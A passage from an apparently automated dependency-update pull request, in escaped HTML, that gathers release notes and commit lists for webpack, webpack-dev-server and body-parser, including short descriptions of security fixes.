types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc\"\u003e\u003ccode\u003e24e3c2d\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20253\"\u003e#20253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2efd21b0b06baa9b1a7f009b336379dcef24c1a5\"\u003e\u003ccode\u003e2efd21b\u003c/code\u003e\u003c/a\u003e fix(re-exports): reexports runtime calculation should not accessing `__WEBPAC...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c5100702335a9cdcb75558ccd80def2329bd4abf\"\u003e\u003ccode\u003ec510070\u003c/code\u003e\u003c/a\u003e fix(security): userinfo bypass vulnerability in HttpUriPlugin allowedUris\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/4b0501c69700963bad1285b56f9cfa74704cb963\"\u003e\u003ccode\u003e4b0501c\u003c/code\u003e\u003c/a\u003e ci: fix release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20252\"\u003e#20252\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c213cecf2906bc41102c3a4cfdd1ad3522d0171\"\u003e\u003ccode\u003e0c213ce\u003c/code\u003e\u003c/a\u003e ci: use \u003ccode\u003e\\\u0026lt;@\u0026amp;1450591255485743204\u0026gt;\u003c/code\u003e over \u003ccode\u003e@here\u003c/code\u003e for discord notificationw\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/5bf8bc51bcfb49d25b73aae450b246cd8b8b423a\"\u003e\u003ccode\u003e5bf8bc5\u003c/code\u003e\u003c/a\u003e refactor: types for benchmarks and tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/505a5e744fbcf4471ddb534bf1d4aebea9643c1b\"\u003e\u003ccode\u003e505a5e7\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20188\"\u003e#20188\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c066808d59e4f9406e11bab4ffa2e0feacbd0e2\"\u003e\u003ccode\u003e0c06680\u003c/code\u003e\u003c/a\u003e refactor: update eslint configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2eb0d6a410513960bd7d65bf15baf15704a612eb\"\u003e\u003ccode\u003e2eb0d6a\u003c/code\u003e\u003c/a\u003e ci: release announcement (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20238\"\u003e#20238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/b2b24590a08755b706d2009ca97a226addf9e83b\"\u003e\u003ccode\u003eb2b2459\u003c/code\u003e\u003c/a\u003e ci: cancel in progress (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20239\"\u003e#20239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.88.0...v5.104.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.1 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `body-parser` from 1.20.1 to 1.20.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/releases\"\u003ebody-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.20.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eThe reason for this release is a fix to the extended urlencoded parser returning objects instead of arrays for large array inputs (\u0026gt; 100) on qs@6.14.2+. (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(json): simplify strict mode error string construction by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/692\"\u003eexpressjs/body-parser#692\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: correct off-by-one error in parameterCount by \u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps(qs): bump qs to 6.15.1 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/722\"\u003eexpressjs/body-parser#722\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.5 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/721\"\u003eexpressjs/body-parser#721\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSpecial thanks to triager \u003ca href=\"https://github.com/krzysdz\"\u003e\u003ccode\u003e@​krzysdz\u003c/code\u003e\u003c/a\u003e for keeping this on our radar and effectively triaging the specific issue!\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.4...1.20.5\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.4...1.20.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove redundant depth check by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/538\"\u003eexpressjs/body-parser#538\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js v23 by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/553\"\u003eexpressjs/body-parser#553\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: restore CI for 1.x branch by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/665\"\u003eexpressjs/body-parser#665\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@^6.14.0 by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/664\"\u003eexpressjs/body-parser#664\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation and update certain dependencies by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/668\"\u003eexpressjs/body-parser#668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: remove SECURITY.md by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/669\"\u003eexpressjs/body-parser#669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add CodeQL (SAST) by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/670\"\u003eexpressjs/body-parser#670\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.4 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/672\"\u003eexpressjs/body-parser#672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eImportant\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIMPORTANT:\u003c/strong\u003e The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e). \u003ca href=\"https://github.com/expressjs/body-parser/blob/17529513673e39ba79886a7ce3363320cf1c0c50/README.md#depth\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echore: add support for OSSF scorecard reporting by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/522\"\u003eexpressjs/body-parser#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: fix errors in ci github action for node 8 and 9 by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/523\"\u003eexpressjs/body-parser#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: pin to node@22.4.1 by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca 